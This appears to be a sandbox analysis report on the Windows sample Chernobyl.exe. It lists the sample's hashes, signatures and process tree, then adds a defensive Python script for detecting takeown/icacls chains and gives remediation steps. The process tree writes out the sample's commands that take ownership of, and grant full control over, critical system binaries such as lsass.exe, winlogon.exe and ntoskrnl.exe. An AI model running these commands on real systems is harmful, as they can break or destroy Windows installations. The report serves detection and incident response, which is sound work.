Analysis
-
Max time kernel: 46s
Max time network: 19s
Platform: windows7_x64
Resource: win7-20240221-en
Resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
Submitted: 02-03-2024 19:25
Static task: static1 (1 signature)
General
-
Target: Chernobyl.exe
Size: 126KB
MD5: d59ea869efea7a22baf00e179e05cca8
SHA1: 96a55a0d6d305dd7c9e11c6fba5eb31dac8d4eab
SHA256: 5afc406a9a72118bd28a15c671a02a1972fc4dfe4cab66db784f4a22a0ae3968
SHA512: a69efdcef30ed5450e9f9d195494d6303b48efdbe253fb740bdc299e7325aebba2e7c27668239b5aa7eddc6717e26c2318700d326ed7e0a8463731f27eb4d892
SSDEEP: 3072:vEbAxMSwSRSE8fdSIbvh8wqYOeuDAQa3tC6cVpL4JOu2/JseB:vEbAO7WEzv4TatcVNqOR/Jd
Malware Config
Signatures
-
Possible privilege escalation attempt (14 IoCs)
Processes (pid, process): 2472 takeown.exe; 2600 takeown.exe; 2572 takeown.exe; 2560 icacls.exe; 668 icacls.exe; 112 takeown.exe; 2700 takeown.exe; 2444 takeown.exe; 2464 takeown.exe; 2000 takeown.exe; 676 takeown.exe; 1692 takeown.exe; 2408 icacls.exe; 328 takeown.exe
-
Modifies file permissions (1 TTP, 14 IoCs)
Processes (pid, process): 2444 takeown.exe; 2560 icacls.exe; 2472 takeown.exe; 328 takeown.exe; 668 icacls.exe; 1692 takeown.exe; 2408 icacls.exe; 2700 takeown.exe; 676 takeown.exe; 112 takeown.exe; 2572 takeown.exe; 2464 takeown.exe; 2000 takeown.exe; 2600 takeown.exe
-
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken (14 IoCs)
Processes (description, pid, process):
Token: SeDebugPrivilege 2208 Chernobyl.exe
Token: SeDebugPrivilege 2208 Chernobyl.exe
Token: SeTakeOwnershipPrivilege 2572 takeown.exe
Token: SeTakeOwnershipPrivilege 2700 takeown.exe
Token: SeTakeOwnershipPrivilege 2444 takeown.exe
Token: SeTakeOwnershipPrivilege 2464 takeown.exe
Token: SeTakeOwnershipPrivilege 2472 takeown.exe
Token: SeTakeOwnershipPrivilege 2000 takeown.exe
Token: SeTakeOwnershipPrivilege 676 takeown.exe
Token: SeTakeOwnershipPrivilege 328 takeown.exe
Token: SeTakeOwnershipPrivilege 2600 takeown.exe
Token: SeTakeOwnershipPrivilege 1692 takeown.exe
Token: SeTakeOwnershipPrivilege 112 takeown.exe
Token: SeShutdownPrivilege 2208 Chernobyl.exe
-
Suspicious use of WriteProcessMemory (64 IoCs; the list is capped at 64 entries and stops partway through the process tree, so the later cmd.exe launches, PIDs 1588, 2832 and 1136, are absent here even though the same parent-to-child writes are implied by the tree)
Processes (source pid/process -> target pid/process, occurrences):
2208 Chernobyl.exe -> 2660 cmd.exe (x4)
2660 cmd.exe -> 2572 takeown.exe (x4)
2208 Chernobyl.exe -> 2632 cmd.exe (x4)
2632 cmd.exe -> 2700 takeown.exe (x4)
2208 Chernobyl.exe -> 2764 cmd.exe (x4)
2764 cmd.exe -> 2444 takeown.exe (x4)
2764 cmd.exe -> 2560 icacls.exe (x4)
2208 Chernobyl.exe -> 2468 cmd.exe (x4)
2468 cmd.exe -> 2464 takeown.exe (x4)
2208 Chernobyl.exe -> 2540 cmd.exe (x4)
2540 cmd.exe -> 2472 takeown.exe (x4)
2208 Chernobyl.exe -> 1344 cmd.exe (x4)
1344 cmd.exe -> 2000 takeown.exe (x4)
2208 Chernobyl.exe -> 2252 cmd.exe (x4)
2252 cmd.exe -> 676 takeown.exe (x4)
2208 Chernobyl.exe -> 1176 cmd.exe (x4)
Processes
-
C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe (PID 2208)
    Command line: "C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe (PID 2660)
      Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\smss.exe && icacls C:\Windows\System32\smss.exe /grant "%username%:F" && exit
      - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\takeown.exe (PID 2572)
        Command line: takeown /f C:\Windows\System32\smss.exe
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\cmd.exe (PID 2632)
      Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit
      - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\takeown.exe (PID 2700)
        Command line: takeown /f C:\Windows\System32\csrss.exe
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\cmd.exe (PID 2764)
      Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit
      - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\takeown.exe (PID 2444)
        Command line: takeown /f C:\Windows\System32\wininit.exe
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\icacls.exe (PID 2560)
        Command line: icacls C:\Windows\System32\wininit.exe /grant "Admin:F"
        - Possible privilege escalation attempt
        - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe (PID 2468)
      Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit
      - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\takeown.exe (PID 2464)
        Command line: takeown /f C:\Windows\System32\LogonUI.exe
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\cmd.exe (PID 2540)
      Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit
      - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\takeown.exe (PID 2472)
        Command line: takeown /f C:\Windows\System32\lsass.exe
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\cmd.exe (PID 1344)
      Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit
      - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\takeown.exe (PID 2000)
        Command line: takeown /f C:\Windows\System32\services.exe
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\cmd.exe (PID 2252)
      Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit
      - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\takeown.exe (PID 676)
        Command line: takeown /f C:\Windows\System32\winlogon.exe
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\cmd.exe (PID 1176)
      Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit
    C:\Windows\SysWOW64\takeown.exe (PID 328)
        Command line: takeown /f C:\Windows\System32\winload.efi
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\cmd.exe (PID 1588)
      Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit
    C:\Windows\SysWOW64\takeown.exe (PID 2600)
        Command line: takeown /f C:\Windows\System32\winload.exe
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\cmd.exe (PID 2832)
      Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit
    C:\Windows\SysWOW64\takeown.exe (PID 1692)
        Command line: takeown /f C:\Windows\System32\ntoskrnl.exe
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\icacls.exe (PID 2408)
        Command line: icacls C:\Windows\System32\ntoskrnl.exe /grant "Admin:F"
        - Possible privilege escalation attempt
        - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe (PID 1136)
      Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit
    C:\Windows\SysWOW64\takeown.exe (PID 112)
        Command line: takeown /f C:\Windows\System32\svchost.exe
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\icacls.exe (PID 668)
        Command line: icacls C:\Windows\System32\svchost.exe /grant "Admin:F"
        - Possible privilege escalation attempt
        - Modifies file permissions
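Two details of the tree matter for triage. First, cmd.exe, takeown.exe and icacls.exe all load from C:\Windows\SysWOW64, so the sample runs as a 32-bit process, and a 32-bit process that opens C:\Windows\System32 is redirected to SysWOW64 by WOW64 file-system redirection; the report does not say which directory's files were actually touched. Second, each chain is joined with `&&`, so the icacls grant only ran where takeown succeeded: wininit.exe, ntoskrnl.exe and svchost.exe. For the other eight targets takeown was launched but icacls never started, i.e. the ownership change failed (consistent with those files not existing under SysWOW64, though the report gives no error text). Note also that `%username%` in the parent command line expanded to Admin in the icacls child. The script below is an added example for this report, not tooling from the sandbox or from the sample's author: it rebuilds the launcher / takeown / icacls relationship from process-creation events, flags orders against protected system binaries, and distinguishes a grant that was merely requested in the command line from one that actually executed. The (pid, ppid, image, command line) tuple layout, the EVENTS list and the PROTECTED set are constructed here from the tree above; map your own Sysmon or EDR fields onto that tuple before use.

```python
"""Reconstruct takeown/icacls ownership-and-ACL chains from process events.

Added example for this report; not sandbox tooling and not the sample's code.
The (pid, ppid, image, command line) tuples in EVENTS are constructed to
mirror the report's process tree; the field layout is an assumption.
"""
import re
from collections import defaultdict

# Targets named in the report's process tree; a production list would be wider.
PROTECTED = {
    "smss.exe", "csrss.exe", "wininit.exe", "logonui.exe", "lsass.exe",
    "services.exe", "winlogon.exe", "winload.efi", "winload.exe",
    "ntoskrnl.exe", "svchost.exe",
}

# "takeown [...] /f <file>"  and  "icacls <file> [...] /grant[:r] <who>:<rights>"
TAKEOWN_RE = re.compile(r'takeown(?:\.exe)?\s+.*?/f\s+("[^"]+"|\S+)', re.I)
ICACLS_RE = re.compile(
    r'icacls(?:\.exe)?\s+("[^"]+"|\S+)\s+.*?/grant(?::r)?\s+("[^"]+"|\S+)', re.I)


def _unquote(s):
    return s.strip('"')


def _basename(path):
    return _unquote(path).replace("/", "\\").rsplit("\\", 1)[-1].lower()


def takeown_target(cmdline):
    """File named by the first 'takeown /f' in a command line, or None."""
    m = TAKEOWN_RE.search(cmdline)
    return _unquote(m.group(1)) if m else None


def icacls_grant(cmdline):
    """(file, grantee, rights) for the first 'icacls ... /grant', or None."""
    m = ICACLS_RE.search(cmdline)
    if not m:
        return None
    who, _, rights = _unquote(m.group(2)).partition(":")
    return _unquote(m.group(1)), who, rights


def is_protected(path):
    """Only system binaries under a System32 directory count; user files do not."""
    return _basename(path) in PROTECTED and "\\system32\\" in _unquote(path).lower()


def analyze(events):
    """One finding per launcher (here cmd.exe) that orders takeown on a protected
    binary, recording whether the follow-up icacls grant actually ran."""
    by_pid = {e[0]: e for e in events}
    kids = defaultdict(list)
    for pid, ppid, _, _ in events:
        kids[ppid].append(pid)

    findings = []
    for pid, ppid, image, cmd in events:
        if _basename(image) in ("takeown.exe", "icacls.exe"):
            continue                      # attributed to their launcher below
        target = takeown_target(cmd)
        if target is None or not is_protected(target):
            continue
        took = [c for c in kids[pid] if _basename(by_pid[c][2]) == "takeown.exe"]
        gave = [c for c in kids[pid] if _basename(by_pid[c][2]) == "icacls.exe"]
        asked = icacls_grant(cmd)                                   # intended grant
        done = icacls_grant(by_pid[gave[0]][3]) if gave else None   # grant that ran
        findings.append({
            "launcher_pid": ppid,
            "cmd_pid": pid,
            "target": _basename(target),
            "takeown_pid": took[0] if took else None,
            "icacls_pid": gave[0] if gave else None,
            "acl_changed": bool(gave),    # with '&&', icacls runs only if takeown succeeded
            "requested_grantee": asked[1] if asked else None,
            "grantee": done[1] if done else None,
            # A 32-bit (SysWOW64) process sees C:\Windows\System32 redirected to
            # SysWOW64, so the literal path may not be the file that was touched.
            "wow64": "\\syswow64\\" in image.lower(),
        })
    return findings


# Constructed subset of the report's tree plus one benign takeown for contrast.
EVENTS = [
    (2208, 1000, r"C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"'),
    (2764, 2208, r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit'),
    (2444, 2764, r"C:\Windows\SysWOW64\takeown.exe", r"takeown /f C:\Windows\System32\wininit.exe"),
    (2560, 2764, r"C:\Windows\SysWOW64\icacls.exe", r'icacls C:\Windows\System32\wininit.exe /grant "Admin:F"'),
    (2540, 2208, r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit'),
    (2472, 2540, r"C:\Windows\SysWOW64\takeown.exe", r"takeown /f C:\Windows\System32\lsass.exe"),
    (3100, 1000, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\notes.txt'),
]

if __name__ == "__main__":
    for f in analyze(EVENTS):
        state = f"grant to {f['grantee']} executed" if f["acl_changed"] else "takeown only, no grant ran"
        print(f"pid {f['cmd_pid']} (parent {f['launcher_pid']}): {f['target']}: {state}; wow64={f['wow64']}")
```

On a live host, treat a finding with acl_changed set as a file whose owner and DACL are no longer the Windows defaults: check the copy under both C:\Windows\System32 and C:\Windows\SysWOW64, compare the binary against a known-good hash, and restore ownership and the ACL (icacls /setowner "NT SERVICE\TrustedInstaller" and /remove of the added Admin ACE, or a reference ACL from a clean machine) rather than only deleting the sample. Findings without acl_changed still record intent, which is what a detection rule on the parent command line should key on.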